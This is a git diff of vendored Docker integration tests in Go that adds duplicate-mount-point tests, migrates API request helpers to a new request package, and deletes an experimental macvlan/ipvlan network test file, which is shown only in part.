+	dockerCmd(c, "run", "--name=data1", image, "true")
+	dockerCmd(c, "run", "--name=data2", image, "true")
+
+	out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1")
+	data1 := strings.TrimSpace(out)
+	c.Assert(data1, checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2")
+	data2 := strings.TrimSpace(out)
+	c.Assert(data2, checker.Not(checker.Equals), "")
+
+	// Both volume should exist
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Contains, data1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, data2)
+
+	// /tmp/data is automatically created, because we are not using the modern mount API here
+	out, _, err := dockerCmdWithError("run", "--name=app", "--volumes-from=data1", "--volumes-from=data2", "-v", "/tmp/data:/tmp/data", "-d", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf("Out: %s", out))
+
+	// No volume will be referenced (mount is /tmp/data), this is backward compatible
+	out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2)
+
+	dockerCmd(c, "rm", "-f", "-v", "app")
+	dockerCmd(c, "rm", "-f", "-v", "data1")
+	dockerCmd(c, "rm", "-f", "-v", "data2")
+
+	// Both volume should not exist
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2)
+}
+
+// Test case (3) for 21845: duplicate targets for --volumes-from and `Mounts` (API only)
+func (s *DockerSuite) TestDuplicateMountpointsForVolumesFromAndMounts(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	image := "vimage"
+	buildImageSuccessfully(c, image, build.WithDockerfile(`
+                FROM busybox
+                VOLUME ["/tmp/data"]`))
+
+	dockerCmd(c, "run", "--name=data1", image, "true")
+	dockerCmd(c, "run", "--name=data2", image, "true")
+
+	out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1")
+	data1 := strings.TrimSpace(out)
+	c.Assert(data1, checker.Not(checker.Equals), "")
+
+	out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2")
+	data2 := strings.TrimSpace(out)
+	c.Assert(data2, checker.Not(checker.Equals), "")
+
+	// Both volume should exist
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Contains, data1)
+	c.Assert(strings.TrimSpace(out), checker.Contains, data2)
+
+	err := os.MkdirAll("/tmp/data", 0755)
+	c.Assert(err, checker.IsNil)
+	// Mounts is available in API
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	config := container.Config{
+		Cmd:   []string{"top"},
+		Image: "busybox",
+	}
+
+	hostConfig := container.HostConfig{
+		VolumesFrom: []string{"data1", "data2"},
+		Mounts: []mount.Mount{
+			{
+				Type:   "bind",
+				Source: "/tmp/data",
+				Target: "/tmp/data",
+			},
+		},
+	}
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &network.NetworkingConfig{}, "app")
+
+	c.Assert(err, checker.IsNil)
+
+	// No volume will be referenced (mount is /tmp/data), this is backward compatible
+	out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2)
+
+	dockerCmd(c, "rm", "-f", "-v", "app")
+	dockerCmd(c, "rm", "-f", "-v", "data1")
+	dockerCmd(c, "rm", "-f", "-v", "data2")
+
+	// Both volume should not exist
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go
index 961aef5525..669e54f1ae 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go
@@ -6,8 +6,9 @@ import (
 	"strings"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
+	"gotest.tools/icmd"
 )
 
 // non-blocking wait with 0 exit code
@@ -36,7 +37,7 @@ func (s *DockerSuite) TestWaitBlockedExitZero(c *check.C) {
 	chWait := make(chan string)
 	go func() {
 		chWait <- ""
-		out, _, _ := runCommandWithOutput(exec.Command(dockerBinary, "wait", containerID))
+		out := icmd.RunCommand(dockerBinary, "wait", containerID).Combined()
 		chWait <- out
 	}()
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go
index 7bc287eca7..ffb06da40f 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go
@@ -7,7 +7,9 @@ import (
 	"net/http"
 	"strings"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
@@ -21,17 +23,24 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartHostConfig(c *check.C) {
 	config := map[string]interface{}{
 		"Binds": []string{"/aa:/bb"},
 	}
-	status, body, err := sockRequest("POST", "/containers/"+name+"/start", config)
+	res, body, err := request.Post("/containers/"+name+"/start", request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusBadRequest)
-	c.Assert(string(body), checker.Contains, "was deprecated since v1.10")
+	c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") {
+		// assertions below won't work before 1.32
+		buf, err := request.ReadBody(body)
+		c.Assert(err, checker.IsNil)
+
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+		c.Assert(string(buf), checker.Contains, "was deprecated since API v1.22")
+	}
 }
 
 func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) {
 	// TODO Windows CI: Investigate further why this fails on Windows to Windows CI.
 	testRequires(c, DaemonIsLinux)
 	path := "/foo"
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		path = `c:\foo`
 	}
 	name := "testing"
@@ -40,17 +49,17 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) {
 		"Volumes": map[string]struct{}{path: {}},
 	}
 
-	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config)
+	res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
 
-	bindPath := randomTmpDirPath("test", daemonPlatform)
+	bindPath := RandomTmpDirPath("test", testEnv.OSType)
 	config = map[string]interface{}{
 		"Binds": []string{bindPath + ":" + path},
 	}
-	status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config)
+	res, _, err = request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 
 	pth, err := inspectMountSourceField(name, path)
 	c.Assert(err, checker.IsNil)
@@ -67,20 +76,28 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartDupVolumeBinds(c *check.C)
 		"Volumes": map[string]struct{}{"/tmp": {}},
 	}
 
-	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config)
+	res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
 
-	bindPath1 := randomTmpDirPath("test1", daemonPlatform)
-	bindPath2 := randomTmpDirPath("test2", daemonPlatform)
+	bindPath1 := RandomTmpDirPath("test1", testEnv.OSType)
+	bindPath2 := RandomTmpDirPath("test2", testEnv.OSType)
 
 	config = map[string]interface{}{
 		"Binds": []string{bindPath1 + ":/tmp", bindPath2 + ":/tmp"},
 	}
-	status, body, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config)
+	res, body, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config))
+	c.Assert(err, checker.IsNil)
+
+	buf, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError)
-	c.Assert(string(body), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(body), err))
+
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
+	c.Assert(string(buf), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(buf), err))
 }
 
 func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) {
@@ -97,16 +114,16 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) {
 		"Volumes": map[string]struct{}{volPath: {}},
 	}
 
-	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config)
+	res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusCreated)
 
 	config = map[string]interface{}{
 		"VolumesFrom": []string{volName},
 	}
-	status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config)
+	res, _, err = request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 
 	pth, err := inspectMountSourceField(name, volPath)
 	c.Assert(err, checker.IsNil)
@@ -127,9 +144,9 @@ func (s *DockerSuite) TestDeprecatedPostContainerBindNormalVolume(c *check.C) {
 	dockerCmd(c, "create", "-v", "/foo", "--name=two", "busybox")
 
 	bindSpec := map[string][]string{"Binds": {fooDir + ":/foo"}}
-	status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/two/start"), bindSpec)
+	res, _, err := request.Post(formatV123StartAPIURL("/containers/two/start"), request.JSONBody(bindSpec))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 
 	fooDir2, err := inspectMountSourceField("two", "/foo")
 	c.Assert(err, checker.IsNil)
@@ -148,11 +165,15 @@ func (s *DockerSuite) TestDeprecatedStartWithTooLowMemoryLimit(c *check.C) {
                 "Memory":    524287
         }`
 
-	res, body, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json")
+	res, body, err := request.Post(formatV123StartAPIURL("/containers/"+containerID+"/start"), request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
-	b, err2 := readBody(body)
+	b, err2 := request.ReadBody(body)
 	c.Assert(err2, checker.IsNil)
-	c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError)
+	} else {
+		c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest)
+	}
 	c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB")
 }
 
@@ -167,7 +188,7 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithoutLinksInHostConfig(
 	hc := inspectFieldJSON(c, name, "HostConfig")
 	config := `{"HostConfig":` + hc + `}`
 
-	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json")
+	res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 	b.Close()
@@ -185,7 +206,7 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfig(c *
 	hc := inspectFieldJSON(c, name, "HostConfig")
 	config := `{"HostConfig":` + hc + `}`
 
-	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json")
+	res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 	b.Close()
@@ -197,13 +218,15 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfigIdLi
 	testRequires(c, DaemonIsLinux)
 	name := "test-host-config-links"
 	out, _ := dockerCmd(c, "run", "--name", "link0", "-d", "busybox", "top")
+	defer dockerCmd(c, "stop", "link0")
 	id := strings.TrimSpace(out)
 	dockerCmd(c, "create", "--name", name, "--link", id, "busybox", "top")
+	defer dockerCmd(c, "stop", name)
 
 	hc := inspectFieldJSON(c, name, "HostConfig")
 	config := `{"HostConfig":` + hc + `}`
 
-	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json")
+	res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 	b.Close()
@@ -217,7 +240,7 @@ func (s *DockerSuite) TestDeprecatedStartWithNilDNS(c *check.C) {
 
 	config := `{"HostConfig": {"Dns": null}}`
 
-	res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json")
+	res, b, err := request.Post(formatV123StartAPIURL("/containers/"+containerID+"/start"), request.RawString(config), request.JSON)
 	c.Assert(err, checker.IsNil)
 	c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent)
 	b.Close()
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go
index 94ef9b1a00..c182b2a7aa 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go
@@ -5,7 +5,8 @@ package main
 import (
 	"fmt"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/internal/test/request"
 	"github.com/go-check/check"
 )
 
@@ -21,7 +22,7 @@ func (s *DockerNetworkSuite) TestDeprecatedDockerNetworkStartAPIWithHostconfig(c
 			"NetworkMode": netName,
 		},
 	}
-	_, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+conName+"/start"), config)
+	_, _, err := request.Post(formatV123StartAPIURL("/containers/"+conName+"/start"), request.JSONBody(config))
 	c.Assert(err, checker.IsNil)
 	c.Assert(waitRun(conName), checker.IsNil)
 	networks := inspectField(c, conName, "NetworkSettings.Networks")
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go
deleted file mode 100644
index 85dec31948..0000000000
--- a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go
+++ /dev/null
@@ -1,594 +0,0 @@
-// +build !windows
-
-package main
-
-import (
-	"os/exec"
-	"strings"
-	"time"
-
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
-	"github.com/docker/docker/pkg/parsers/kernel"
-	"github.com/go-check/check"
-)
-
-var (
-	MacvlanKernelSupport = testRequirement{
-		func() bool {
-			const macvlanKernelVer = 3 // minimum macvlan kernel support
-			const macvlanMajorVer = 9  // minimum macvlan major kernel support
-			kv, err := kernel.GetKernelVersion()
-			if err != nil {
-				return false
-			}
-			// ensure Kernel version is >= v3.9 for macvlan support
-			if kv.Kernel < macvlanKernelVer || (kv.Kernel == macvlanKernelVer && kv.Major < macvlanMajorVer) {
-				return false
-			}
-			return true
-		},
-		"kernel version failed to meet the minimum macvlan kernel requirement of 3.9",
-	}
-	IpvlanKernelSupport = testRequirement{
-		func() bool {
-			const ipvlanKernelVer = 4 // minimum ipvlan kernel support
-			const ipvlanMajorVer = 2  // minimum ipvlan major kernel support
-			kv, err := kernel.GetKernelVersion()
-			if err != nil {
-				return false
-			}
-			// ensure Kernel version is >= v4.2 for ipvlan support
-			if kv.Kernel < ipvlanKernelVer || (kv.Kernel == ipvlanKernelVer && kv.Major < ipvlanMajorVer) {
-				return false
-			}
-			return true
-		},
-		"kernel version failed to meet the minimum ipvlan kernel requirement of 4.0.0",
-	}
-)
-
-func (s *DockerNetworkSuite) TestDockerNetworkMacvlanPersistance(c *check.C) {
-	// verify the driver automatically provisions the 802.1q link (dm-dummy0.60)
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-
-	// master dummy interface 'dm' abbreviation represents 'docker macvlan'
-	master := "dm-dummy0"
-	// simulate the master link the vlan tagged subinterface parent link will use
-	out, err := createMasterDummy(c, master)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network specifying the desired sub-interface name
-	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.60", "dm-persist")
-	assertNwIsAvailable(c, "dm-persist")
-	// Restart docker daemon to test the config has persisted to disk
-	s.d.Restart()
-	// verify network is recreated from persistence
-	assertNwIsAvailable(c, "dm-persist")
-	// cleanup the master interface that also collects the slave dev
-	deleteInterface(c, "dm-dummy0")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanPersistance(c *check.C) {
-	// verify the driver automatically provisions the 802.1q link (di-dummy0.70)
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	// master dummy interface 'di' notation represent 'docker ipvlan'
-	master := "di-dummy0"
-	// simulate the master link the vlan tagged subinterface parent link will use
-	out, err := createMasterDummy(c, master)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network specifying the desired sub-interface name
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.70", "di-persist")
-	assertNwIsAvailable(c, "di-persist")
-	// Restart docker daemon to test the config has persisted to disk
-	s.d.Restart()
-	// verify network is recreated from persistence
-	assertNwIsAvailable(c, "di-persist")
-	// cleanup the master interface that also collects the slave dev
-	deleteInterface(c, "di-dummy0")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkMacvlanSubIntCreate(c *check.C) {
-	// verify the driver automatically provisions the 802.1q link (dm-dummy0.50)
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	// master dummy interface 'dm' abbreviation represents 'docker macvlan'
-	master := "dm-dummy0"
-	// simulate the master link the vlan tagged subinterface parent link will use
-	out, err := createMasterDummy(c, master)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network specifying the desired sub-interface name
-	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.50", "dm-subinterface")
-	assertNwIsAvailable(c, "dm-subinterface")
-	// cleanup the master interface which also collects the slave dev
-	deleteInterface(c, "dm-dummy0")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanSubIntCreate(c *check.C) {
-	// verify the driver automatically provisions the 802.1q link (di-dummy0.50)
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	// master dummy interface 'dm' abbreviation represents 'docker ipvlan'
-	master := "di-dummy0"
-	// simulate the master link the vlan tagged subinterface parent link will use
-	out, err := createMasterDummy(c, master)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network specifying the desired sub-interface name
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.60", "di-subinterface")
-	assertNwIsAvailable(c, "di-subinterface")
-	// cleanup the master interface which also collects the slave dev
-	deleteInterface(c, "di-dummy0")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkMacvlanOverlapParent(c *check.C) {
-	// verify the same parent interface cannot be used if already in use by an existing network
-	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	// master dummy interface 'dm' abbreviation represents 'docker macvlan'
-	master := "dm-dummy0"
-	out, err := createMasterDummy(c, master)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	out, err = createVlanInterface(c, master, "dm-dummy0.40", "40")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network using an existing parent interface
-	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-subinterface")
-	assertNwIsAvailable(c, "dm-subinterface")
-	// attempt to create another network using the same parent iface that should fail
-	out, _, err = dockerCmdWithError("network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-parent-net-overlap")
-	// verify that the overlap returns an error
-	c.Assert(err, check.NotNil)
-	// cleanup the master interface which also collects the slave dev
-	deleteInterface(c, "dm-dummy0")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanOverlapParent(c *check.C) {
-	// verify the same parent interface cannot be used if already in use by an existing network
-	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	// master dummy interface 'dm' abbreviation represents 'docker ipvlan'
-	master := "di-dummy0"
-	out, err := createMasterDummy(c, master)
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	out, err = createVlanInterface(c, master, "di-dummy0.30", "30")
-	c.Assert(err, check.IsNil, check.Commentf(out))
-	// create a network using an existing parent interface
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-subinterface")
-	assertNwIsAvailable(c, "di-subinterface")
-	// attempt to create another network using the same parent iface that should fail
-	out, _, err = dockerCmdWithError("network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-parent-net-overlap")
-	// verify that the overlap returns an error
-	c.Assert(err, check.NotNil)
-	// cleanup the master interface which also collects the slave dev
-	deleteInterface(c, "di-dummy0")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkMacvlanMultiSubnet(c *check.C) {
-	// create a dual stack multi-subnet Macvlan bridge mode network and validate connectivity between four containers, two on each subnet
-	testRequires(c, DaemonIsLinux, IPv6, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.100.0/24", "--subnet=172.28.102.0/24", "--gateway=172.28.102.254",
-		"--subnet=2001:db8:abc2::/64", "--subnet=2001:db8:abc4::/64", "--gateway=2001:db8:abc4::254", "dualstackbridge")
-	// Ensure the network was created
-	assertNwIsAvailable(c, "dualstackbridge")
-	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.100.0/24 and 2001:db8:abc2::/64
-	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "--ip", "172.28.100.20", "--ip6", "2001:db8:abc2::20", "busybox", "top")
-	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=second", "--ip", "172.28.100.21", "--ip6", "2001:db8:abc2::21", "busybox", "top")
-
-	// Inspect and store the v4 address from specified container on the network dualstackbridge
-	ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackbridge
-	ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address")
-
-	// verify ipv4 connectivity to the explicit --ipv address second to first
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	// verify ipv6 connectivity to the explicit --ipv6 address second to first
-	c.Skip("Temporarily skipping while invesitigating sporadic v6 CI issues")
-	_, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64
-	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=third", "--ip", "172.28.102.20", "--ip6", "2001:db8:abc4::20", "busybox", "top")
-	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=fourth", "--ip", "172.28.102.21", "--ip6", "2001:db8:abc4::21", "busybox", "top")
-
-	// Inspect and store the v4 address from specified container on the network dualstackbridge
-	ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackbridge
-	ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address")
-
-	// verify ipv4 connectivity to the explicit --ipv address from third to fourth
-	_, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	// verify ipv6 connectivity to the explicit --ipv6 address from third to fourth
-	_, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// Inspect the v4 gateway to ensure the proper default GW was assigned
-	ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.Gateway")
-	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.100.1")
-	// Inspect the v6 gateway to ensure the proper default GW was assigned
-	ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway")
-	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc2::1")
-
-	// Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned
-	ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.Gateway")
-	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.102.254")
-	// Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned
-	ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway")
-	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc4::254")
-}
-
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL2MultiSubnet(c *check.C) {
-	// create a dual stack multi-subnet Ipvlan L2 network and validate connectivity within the subnets, two on each subnet
-	testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
-	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.200.0/24", "--subnet=172.28.202.0/24", "--gateway=172.28.202.254",
-		"--subnet=2001:db8:abc8::/64", "--subnet=2001:db8:abc6::/64", "--gateway=2001:db8:abc6::254", "dualstackl2")
-	// Ensure the network was created
-	assertNwIsAvailable(c, "dualstackl2")
-	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.200.0/24 and 2001:db8:abc8::/64
-	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=first", "--ip", "172.28.200.20", "--ip6", "2001:db8:abc8::20", "busybox", "top")
-	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "--ip", "172.28.200.21", "--ip6", "2001:db8:abc8::21", "busybox", "top")
-
-	// Inspect and store the v4 address from specified container on the network dualstackl2
-	ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPAddress")
-	// Inspect and store the v6 address from specified container on the network dualstackl2
-	ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address")
-
-	// verify ipv4 connectivity to the explicit --ipv address second to first
-	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip))
-	c.Assert(err, check.IsNil)
-	// verify ipv6 connectivity to the explicit --ipv6 address second to first
-	_, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6))
-	c.Assert(err, check.IsNil)
-
-	// start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.202.0/24 and 2001:db8:abc6::/64
-	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=third", "--ip", "172.28.202.20", "--ip6", "2001:db8:abc6::20", "busybox", "top")
-	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=fourth", "--ip", "172.28.202.21", "--ip6", "2001:db8:abc6::21", "busybox", "top")
-
